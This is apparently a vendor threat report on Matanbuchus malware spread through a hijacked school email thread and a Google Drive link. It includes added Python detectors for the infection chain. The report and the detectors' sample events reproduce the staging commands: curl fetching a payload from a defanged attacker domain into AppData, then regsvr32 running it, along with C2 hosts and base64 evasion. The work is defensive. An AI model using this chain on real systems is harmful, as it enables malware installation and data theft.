
Google Drive as a Distribution Method for Matanbuchus Malware

In this attack, threat actors impersonate a teacher to deliver Matanbuchus malware-as-a-service (MaaS) using a Google Drive link.
August 18, 2022

Initially launched in February 2021, Matanbuchus is a malware-as-a-service (MaaS) available on Russian-speaking cybercrime forums.

Similar to other malware loaders like BazarLoader, Matanbuchus is malicious software designed to download and run second-stage executable files from command and control (C&C or C2) servers without being detected. According to Matanbuchus' author, the malware can launch a .exe or .dll file in memory, run custom PowerShell commands, and more.

Abnormal recently observed a new approach to delivering the malware loader. Combining more convincing social engineering tactics with legitimate infrastructure—in this case Google Drive—threat actors are able to launch an attack that is significantly more difficult to detect.

Hijacking an Email Thread Using a Compromised Account

In June 2022, Abnormal detected an email purporting to come from a teacher at a well-known district school. Using a hijacked thread, the attackers leveraged the teacher's identity and the real school at which she worked as a way to avoid detection. Additionally, the email account used to deliver this message belongs to a legitimate domain that is presumed to have been compromised.

The attackers took advantage of multiple elements, not only to create an appearance of credibility that fools targets but also to obfuscate the malware and bypass email security. The diagram below shows the flow of the attack detected by Abnormal, up to the point of downloading the Matanbuchus malware, which in turn would download another malware family such as Cobalt Strike.

[Figure: Matanbuchus malware attack flow]

Threat Analysis

The impersonated party in this attack is a teacher who is employed by the district school and is also a member of a group that supports the school community. The attack begins with the hijacked thread from the teacher inviting recipients to participate in the next community meeting. The message includes a Google Drive URL, which the threat actor claims is a link to a document related to the event.

[Figure: Phishing email]

This Google Drive link downloads a zip file with a LNK file inside.

[Figure: Zip file downloaded from the Google Drive link]

Within its properties, the LNK file has the command-line argument that it needs to initiate the second stage.

[Figure: LNK properties]

Only a small snippet of the target path is visible; however, the command-line argument extends beyond what the victim can see.

[Figure: Complete argument in the LNK target property]

The first step in this argument is to create the hP folder and then check for an internet connection by pinging Mh4m[.]com and 4umz[.]com. Because these are clean URLs, the connectivity check does not stand out as suspicious network traffic.

[Figure: LNK file checking the internet connection]

The second step in the argument is to download a second file, using curl, from https://re9cred[.]com/N9tIgZB/Wq.png. The file, uVbU.UEMX.pafB, is saved in the hidden directory ..\AppData\Roaming\hP, which keeps it out of the victim's sight.

[Figure: Second file downloaded via curl]

The second file is executed with regsvr32. It contains several domains from which it can download a third file, which increases the chance that the download succeeds.

[Figure: Different C2 servers available to download Matanbuchus]
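As an added example (not code from the original report), the following Python script turns the staging chain described above into a detection over constructed Sysmon-style process-creation events: curl writing its download into AppData, followed by regsvr32 loading a non-.dll file from the same tree under one parent process. The event fields, pids and the C:\Users\u path are assumptions modelled on the report.

```python
import re
from collections import defaultdict

# Constructed process-creation events (not telemetry from the incident), modelled on the
# LNK chain in the report: cmd.exe spawns ping, curl (download into AppData\Roaming\hP)
# and regsvr32 (loading the renamed file). The C:\Users\u path is an assumption.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "cmd.exe", "cmdline": "cmd.exe /c <LNK argument>"},
    {"pid": 201, "ppid": 200, "image": "PING.EXE", "cmdline": "ping Mh4m[.]com"},
    {"pid": 202, "ppid": 200, "image": "PING.EXE", "cmdline": "ping 4umz[.]com"},
    {"pid": 203, "ppid": 200, "image": "curl.exe", "cmdline":
     r"curl https://re9cred[.]com/N9tIgZB/Wq.png -o C:\Users\u\AppData\Roaming\hP\uVbU.UEMX.pafB"},
    {"pid": 204, "ppid": 200, "image": "regsvr32.exe", "cmdline":
     r"regsvr32 C:\Users\u\AppData\Roaming\hP\uVbU.UEMX.pafB"},
    # Benign control: an installer registering a real DLL from Program Files.
    {"pid": 300, "ppid": 1, "image": "setup.exe", "cmdline": "setup.exe"},
    {"pid": 301, "ppid": 300, "image": "regsvr32.exe", "cmdline":
     r"regsvr32 /s C:\Program Files\Vendor\lib.dll"},
]

APPDATA = re.compile(r"\\AppData\\(?:Roaming|Local)\\", re.IGNORECASE)
OUTPUT_FLAG = re.compile(r"(?:^|\s)(?:-o|--output)\s+(\S+)")
DLL_EXT = re.compile(r"\.dll$", re.IGNORECASE)


def curl_to_profile(cmdline):
    """True if curl writes its download somewhere under the user's AppData tree."""
    m = OUTPUT_FLAG.search(cmdline)
    return bool(m and APPDATA.search(m.group(1)))


def regsvr32_renamed_module(cmdline):
    """True if regsvr32 loads a file from AppData whose extension is not .dll."""
    args = [a for a in cmdline.split()[1:] if not a.startswith("/")]
    return any(APPDATA.search(a) and not DLL_EXT.search(a) for a in args)


def find_staging_chains(events):
    """Map each parent pid whose children show curl-to-AppData plus regsvr32-from-AppData
    to the sorted list of stages observed under it (ping recorded as supporting context)."""
    stages = defaultdict(set)
    for e in events:
        img, cmd = e["image"].lower(), e["cmdline"]
        if img == "ping.exe":
            stages[e["ppid"]].add("ping")
        elif img == "curl.exe" and curl_to_profile(cmd):
            stages[e["ppid"]].add("curl")
        elif img == "regsvr32.exe" and regsvr32_renamed_module(cmd):
            stages[e["ppid"]].add("regsvr32")
    return {p: sorted(s) for p, s in stages.items() if {"curl", "regsvr32"} <= s}
```

Running `find_staging_chains(EVENTS)` flags only parent pid 200; the installer's regsvr32 call on a real DLL outside the profile is not reported.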

The file connects to the C2 telemetryreporting[.]com at IP 31[.]41[.]244[.]234 and downloads the Matanbuchus malware. All of the network traffic is base64 encoded as an anti-detection technique.

[Figure: Wireshark packets showing the malware download, encoded in base64]

Matanbuchus malware is saved in the hidden directory ..\AppData\Local\9e0a with the name x86.nls.

[Figure: Malware saved in the local folder as x86.nls]

After the malware is downloaded, the host keeps sending the same information to the C2 31[.]41[.]244[.]230 to maintain the established connection.

[Figure: Connection established with the C2]

As we saw before, the traffic is encoded in base64.

[Figure: HTTP POST request packet from the C2 network traffic]

In this case, after decoding the base64 we can see several arguments, potentially related to the victim's system configuration.

[Figure: Base64-decoded C2 network traffic]
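To show how the base64-encoded POST traffic described above can be triaged from a capture, here is an added Python example (not code from the original report). It builds a constructed beacon to the report's C2 host, decodes any body that is entirely base64 into key=value fields, and counts repeated identical beacons, since the report notes the host keeps sending the same information after the download. The decoded field names are an assumption for illustration, not the real Matanbuchus format.

```python
import base64
import re
from collections import Counter
from urllib.parse import parse_qs

B64_BODY = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def build_request(host, path, plain_body):
    """Constructed beacon: a POST whose entire body is the base64 of plain_body."""
    body = base64.b64encode(plain_body).decode("ascii")
    return (
        f"POST {path} HTTP/1.1\r\nHost: {host}\r\n"
        f"Content-Length: {len(body)}\r\n\r\n{body}"
    )


def decode_beacon(raw):
    """If the request body is entirely base64 and decodes to printable key=value text,
    return (host, fields); otherwise None (body not base64, binary, or not key=value)."""
    head, _, body = raw.partition("\r\n\r\n")
    m = re.search(r"^Host:\s*(\S+)", head, re.MULTILINE | re.IGNORECASE)
    host = m.group(1) if m else ""
    body = body.strip()
    if not B64_BODY.match(body) or len(body) % 4:
        return None
    try:
        plain = base64.b64decode(body, validate=True).decode("ascii")
        if not plain.isprintable():
            return None
        fields = {k: v[0] for k, v in parse_qs(plain, strict_parsing=True).items()}
    except (UnicodeDecodeError, ValueError):  # binascii.Error is a ValueError
        return None
    return host, fields


def repeated_beacons(raws, min_count=3):
    """Flag (host, decoded fields) pairs seen at least min_count times: the same
    decoded payload sent repeatedly to one host is the keep-alive pattern described."""
    counts = Counter()
    for r in raws:
        dec = decode_beacon(r)
        if dec:
            counts[(dec[0], tuple(sorted(dec[1].items())))] += 1
    return {k: n for k, n in counts.items() if n >= min_count}


# Sample beacon to the report's C2 host; field names are constructed for illustration.
SAMPLE_BEACON = build_request("telemetryreporting[.]com", "/",
                              b"host=WS-042&user=jdoe&os=10.0.19044&arch=x86&ver=1.2")
# Control: an ordinary JSON POST that must not be flagged.
SAMPLE_JSON = "POST /api HTTP/1.1\r\nHost: app.example\r\n\r\n{\"status\": \"ok\"}"
```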

Blocking Advanced Malware Attacks

The threat actors used a powerful combination of tactics to launch this attack: impersonating a real teacher at a well-known school, exploiting a legitimate domain, leveraging Google Drive as the infrastructure, and using a sophisticated malware loader. Because the attack is built on legitimate elements, the threat actors can more easily fool the target and execute the multi-stage attack.

In addition, decoding the malicious code in memory makes it harder for security systems to detect the malware. A traditional email security platform would be incapable of stopping an attack of this complexity. Effectively blocking these kinds of attacks requires a solution designed specifically to detect these indicators of compromise.

Indicators of Compromise (IOCs)

Zip file
LNK file
Malicious dll